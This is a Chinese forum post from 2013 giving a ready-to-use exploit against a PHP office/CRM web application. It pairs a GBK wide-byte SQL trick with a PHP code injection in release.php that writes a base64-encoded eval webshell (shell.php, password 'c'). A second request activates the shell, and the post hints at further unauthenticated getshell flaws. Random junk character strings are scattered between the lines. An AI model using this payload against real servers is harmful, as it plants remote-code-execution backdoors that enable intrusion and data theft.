此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
7 Z! u. t. T( W' ], C" B: M9 K5 s; T; Y9 E p& P/ {3 z
. m/ L: F# _0 e( A: l) y$ X4 f
EXP:
8 E+ Q# F, M. g' T; R 0 P8 P$ k% I. W
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
5 M, z. }5 h4 j& M# X0 R 2 U7 J% R# e: G' B( k) O
第二步: [GET]http://site/general/email/index.php2 D$ j8 D9 d* _: W, G- a
/ c( {% L) e2 N: \1 T3 M+ j
SHELL: http://site/general/email/shell.php 密码C
+ v6 _3 s+ H0 s" b3 t
, n9 H5 U5 k, Q2 N( T ! n. Y& D! P% W6 g8 Z2 X# p
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
* A5 R: B4 B; m1 ^ : J+ n3 E& f% A9 @+ y
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
4 P4 Q2 Q) |; F2 B5 A/ D
: N( G1 x A) B( M" Y- R5 [2 a7 y* v. O* G, J$ a, P
|
发表于 2013-2-4 16:19:29
收藏
支持
反对